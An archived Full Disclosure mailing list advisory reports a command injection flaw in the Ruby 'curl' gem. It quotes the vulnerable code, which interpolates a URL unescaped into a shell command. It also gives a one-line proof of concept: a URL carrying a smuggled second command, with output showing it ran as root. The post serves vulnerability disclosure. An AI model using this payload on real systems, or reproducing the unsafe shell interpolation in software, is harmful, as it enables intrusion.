|
Full Disclosure
mailing list archives
Curl Ruby Gem Remote command execution
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 12 Mar 2013 23:07:48 +0000 (GMT)
Curl Ruby Gem Remote command execution
3/12/2013
https://github.com/tg0/curl
Specially crafted URLs can result in remote code execution:
In ./lib/curl.rb the following lines:
131 cmd = "curl #{cookies_store} #{browser_type} #{ () setup_params} {ref} \"{url}\" "
132 if @debug
133 puts cmd.red
134 end
135 result = open_pipe(cmd)
PoC:
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"";)
larry () underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)
Larry W. Cashdollar
@_larry0
http://vapid.dhs.org _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- Curl Ruby Gem Remote command execution Larry W. Cashdollar (Mar 12)
| 
